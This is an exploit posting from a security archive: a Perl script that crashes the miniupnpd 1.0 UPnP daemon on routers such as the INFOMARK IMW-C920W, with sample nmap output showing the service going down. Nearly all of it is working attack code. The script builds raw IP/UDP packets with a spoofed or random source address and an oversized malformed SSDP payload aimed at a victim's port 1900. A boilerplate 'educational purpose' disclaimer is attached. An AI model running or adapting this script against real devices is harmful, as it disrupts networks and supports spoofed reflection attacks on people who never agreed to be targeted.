
MiniUPNPd 1.0 Remote Denial Of Service

2015-07-08 00:00:00
Todor Donev
packetstormsecurity.com

0.974 High

EPSS

Percentile

99.9%

`#!/usr/bin/perl  
#  
# miniupnpd/1.0 remote denial of service exploit  
#  
# Copyright 2015 (c) Todor Donev   
# [email protected]  
# http://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
#  
# The SSDP protocol discovers Plug & Play devices
# with uPnP (Universal Plug and Play). SSDP is an HTTP-
# like protocol and works with NOTIFY and M-SEARCH
# methods.
#  
# See also:   
# CVE-2013-0229   
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229   
# CVE-2013-0230  
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230  
#   
# Tested on  
# Device Name : IMW-C920W  
# Device Manufacturer : INFOMARK (http://infomark.co.kr)  
#   
# These devices are commonly used by Max Telecom, Bulgaria  
#  
# Disclaimer:  
# This or previous program is for Educational  
# purpose ONLY. Do not use it without permission.  
# The usual disclaimer applies, especially the  
# fact that Todor Donev is not liable for any  
# damages caused by direct or indirect use of the  
# information or functionality provided by these  
# programs. The author or any Internet provider  
# bears NO responsibility for content or misuse  
# of these programs or any derivatives thereof.  
# By using these programs you accept the fact  
# that any damage (dataloss, system crash,  
# system compromise, etc.) caused by the use  
# of these programs is not Todor Donev's  
# responsibility.  
#   
# Use at your own risk!  
#  
# See also:  
# SSDP Reflection DDoS Attacks   
# http://tinyurl.com/mqwj6xt  
#  
#######################################  
#  
# # perl miniupnpd.pl  
#   
# [ miniupnpd/1.0 remote denial of service exploit ]  
# [ =============================================== ]  
# [ Usage:   
# [ ./miniupnpd.pl <victim address> <spoofed address>  
# [ Example:  
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37  
# [ Example:  
# [ perl miniupnpd.pl 192.168.1.1  
# [ =============================================== ]  
# [ 2015 <[email protected]> Todor Donev 2015 ]  
#  
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info  
#  
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST  
# Nmap scan report for 192.168.1.1  
# Host is up (0.00078s latency).  
# PORT STATE SERVICE  
# 1900/udp open upnp  
# | upnp-info:  
# | 192.168.1.1  
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0  
# | Location: http://192.168.1.1:5000/rootDesc.xml  
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0  
# | Name: INFOMARK Router  
# | Manufacturer: INFOMARK  
# | Model Descr: INFOMARK Router  
# | Model Name: INFOMARK Router  
# | Model Version: 1  
# | Name: WANDevice  
# | Manufacturer: MiniUPnP  
# | Model Descr: WAN Device  
# | Model Name: WAN Device  
# | Model Version: 20070228  
# | Name: WANConnectionDevice  
# | Manufacturer: MiniUPnP  
# | Model Descr: MiniUPnP daemon  
# | Model Name: MiniUPnPd  
# |_ Model Version: 20070228  
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED  
#   
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds  
#  
# # perl miniupnpd.pl 192.168.1.1  
#  
# [ miniupnpd/1.0 remote denial of service exploit ]  
# [ =============================================== ]  
# [ Target: 192.168.1.1  
# [ Send malformed SSDP packet..  
#  
# # nmap -sU 192.168.1.1 -p1900  
#   
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST  
# Nmap scan report for 192.168.1.1  
# Host is up (0.00085s latency).  
# PORT STATE SERVICE  
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D  
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED  
#   
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds  
#  
#  
# Special thanks to HD Moore ..  
#  
  
use Socket;  
  
# Refuse to run unless the real UID is 0: the raw socket opened further
# down normally requires that privilege.
unless ( $< == 0 ) {
    print "Sorry, must be run as root!\n", "This script use RAW Socket.\n";
    exit;
}

# Resolve both command-line hosts to packed 4-byte addresses; a missing
# or unresolvable argument leaves the corresponding value undef.  These
# two file-scope lexicals are read by iphdr() and send_packet() below.
my ( $victim_host, $spoofed_host ) = @ARGV;
my $ip_src = ( gethostbyname($spoofed_host) )[4];
my $ip_dst = ( gethostbyname($victim_host) )[4];

print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n",
      "[ =============================================== ]\n";
select( undef, undef, undef, 0.40 );    # cosmetic pause

# Usage text when the victim address is absent or did not resolve.
unless ( defined $ip_dst ) {
    print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select( undef, undef, undef, 0.55 );
    print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n",
          "[ Example:\n[ perl $0 192.168.1.1\n",
          "[ =============================================== ]\n",
          "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
    exit;
}

# Raw IPv4 socket with protocol number 255 (IPPROTO_RAW on Linux).  The
# setsockopt() uses bare numbers: level 0 / option 1 is presumably
# IPPROTO_IP / IP_HDRINCL, i.e. the script supplies its own IP header --
# confirm against the target platform's headers.  RAW is a bareword
# handle that send_packet() relies on.
socket( RAW, PF_INET, SOCK_RAW, 255 ) or die $!;
setsockopt( RAW, 0, 1, 1 ) or die $!;
main();
  
# Main program  
sub main {
    # Assemble IP header, UDP header and SSDP payload -- evaluated in that
    # order -- and hand the finished datagram to send_packet().
    my $packet = join '', iphdr(), udphdr(), payload();
    # b000000m...
    send_packet($packet);
}
  
# IP header (Layer 3)  
sub iphdr {
    # Build the 20-byte IPv4 header.  The pack() template at the bottom
    # decides the actual bytes on the wire, so several comments spell out
    # what the template does with each value.
    my $ip_ver = 4; # IP Version 4 (4 bits)
    my $iphdr_len = 5; # IP Header Length (4 bits), in 32-bit words: 5 => 20 bytes
    my $ip_tos = 0; # Differentiated Services (8 bits)
    # NOTE(review): this evaluates to 5 + 20 = 25, which is neither the header
    # size (20) nor the header-plus-data length the trailing comment describes.
    # What a raw socket does with this field is platform-specific -- not
    # verified here.
    my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
    my $ip_frag_id = 0; # Identification Field (16 bits)
    my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits) -- octal literal, value 0
    my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits) -- octal literal, value 0
    my $ip_ttl = 255; # IP TTL (8 bits); see the h2 template note below
    my $ip_proto = 17; # IP Protocol (8 bits): 17 = UDP
    my $ip_checksum = 0; # IP Checksum (16 bits); not computed by this script
    # IP Source (32 bits).  NOTE(review): a `my` with a statement modifier is
    # documented as undefined behaviour (perlsyn).  The condition tests the
    # file-scope $ip_src (a lexical declared by `my` is not visible until the
    # next statement), but the $ip_src that pack() reads below is this inner
    # lexical; when the modifier is false nothing in this sub assigns it, so it
    # is presumably undef on that path.  randip() returns dotted-quad text and
    # gethostbyname() in scalar context yields the packed 4-byte form.
    my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
    # IP Packet construction.  Template, field by field:
    #   H2  "45"  -> version/IHL nibbles (0x45)
    #   H2  TOS as hex digits ("0" -> 0x00)
    #   n   total length, big-endian
    #   n   identification
    #   B16 flags+offset as a bit string; "00" is zero-padded to 16 bits
    #   h2  TTL as hex digits, LOW nibble first: "255" -> "2","5" -> 0x52 (82),
    #       not 255
    #   c   protocol as a signed byte (17)
    #   n   checksum
    #   a4 a4 source and destination addresses, NUL-padded to 4 bytes
    my $iphdr = pack(
        'H2 H2 n n B16 h2 c n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
        $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
        $ip_ttl, $ip_proto, $ip_checksum,
        $ip_src, $ip_dst
    );

    return $iphdr;
}
  
# UDP header (Layer 4)  
sub udphdr {
    # 8-byte UDP header.  payload() is called here only to measure it; its
    # length is fixed (request line + 1261 letters = 1284 bytes), so the
    # value matches the payload that main() actually appends.
    my $src_port = 31337;                     # UDP source port (16 bits)
    my $dst_port = 1900;                      # UDP destination port (16 bits): SSDP
    my $udp_len  = 8 + length( payload() );   # header + data, in bytes (16 bits)
    my $checksum = 0;                         # 0 = "no checksum" for UDP over IPv4 (RFC 768)
    return pack( 'n4', $src_port, $dst_port, $udp_len, $checksum );
}
  
# Create SSDP Bomb  
sub payload {
    # "SSDP bomb": one M-SEARCH request line followed by 1261 pseudo-random
    # uppercase letters (A..Y), 1284 bytes in total.  Because the backslashes
    # in the literal are escaped, "\r\n" goes out as four literal characters
    # rather than CRLF.
    my $data = "M-SEARCH * HTTP\/1.1\\r\\n";
    $data .= join '', map { chr( int( rand(25) + 65 ) ) } 0 .. 1260;
    # pack 'a<len>' of the string itself is an identity copy.
    return pack( 'a' . length($data), $data );
}
  
# Generate random source ip address  
sub randip () {
    # Re-seed from the clock and PID, then build a dotted quad of four
    # octets in 0..254.  Returned as text; the caller resolves it.
    srand( time() ^ ( $$ + ( $$ << 15 ) ) );
    my $ipdata = join '.', map { int( rand(255) ) } 1 .. 4;
    # This pack() result is never used; the rand() call is kept so the PRNG
    # sequence seen by later callers is unchanged.
    my $ipsrc = pack( 'A' . length($ipdata), rand($ipdata) );
    return $ipdata;
}
  
# Send the malformed packet  
sub send_packet {
    # Announce the target, then hand the pre-built datagram ($_[0]) to the
    # raw socket opened at file scope.
    my ($packet) = @_;
    print "[ Target: $ARGV[0]\n";
    select( undef, undef, undef, 0.30 );    # cosmetic pause
    print "[ Send malformed SSDP packet..\n\n";
    # sockaddr_in built by hand: native short family, port 60 big-endian,
    # 4-byte address, 8 bytes of padding.  NOTE(review): this port differs
    # from the UDP destination port (1900) inside the datagram; which one the
    # kernel honours on a raw socket is platform-specific -- not verified here.
    my $sockaddr = pack( 'Sna4x8', PF_INET, 60, $ip_dst );
    send( RAW, $packet, 0, $sockaddr ) or die $!;
}
  
  